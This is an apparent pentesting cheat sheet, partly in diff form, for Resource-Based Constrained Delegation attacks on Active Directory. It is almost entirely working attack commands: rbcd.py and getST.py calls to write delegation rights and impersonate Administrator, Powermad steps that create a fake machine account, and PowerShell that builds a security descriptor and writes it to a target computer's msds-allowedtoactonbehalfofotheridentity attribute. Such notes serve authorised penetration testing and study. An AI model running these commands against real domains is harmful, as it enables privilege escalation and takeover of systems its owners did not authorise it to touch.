H3llKa1ser/B00t2R00t/Active Directory Penetration Testing/Kerberos Delegation/Resource-Based Constrained Delegation (RBCD).md

  - rbcd.py -delegate-from 'COMPUTER$' -delegate-to 'TARGET$' -dc-ip 'DC' -action 'write' DOMAIN/USER:PASSWORD

  - getST.py -spn host/DC_FQDN 'DOMAIN/COMPUTER_ACCOUNT:COMPUTER_PASS' -impersonate Administrator --dc-ip DC_IP (Get TGT ticket)

+#### 4) Powermad

+ - import-module powermad

+ - New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose (Create a new computer object)

+ - Get-DomainComputer fake01 (Check our newly created computer and get its SID)

+### Create a new raw security descriptor for the FAKE01 computer principal

+ - $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2552734371-813931464-1050690807-1154)"

+ - $SDBytes = New-Object byte[] ($SD.BinaryLength)

+ - $SD.GetBinaryForm($SDBytes, 0)

+### Apply the security descriptor bytes to the target machine

+ - Get-DomainComputer TARGET_COMPUTER | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

+ - (New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0).DiscretionaryAcl (Test if the security descriptor assigned to target computer in msds-allowedtoactonbehalfofotheridentity attribute refers to the fake01$ machine.
+If yes, we shall see the SID of our created computer)

+### Then use Rubeus or getST to impersonate an account on our target computer of our choice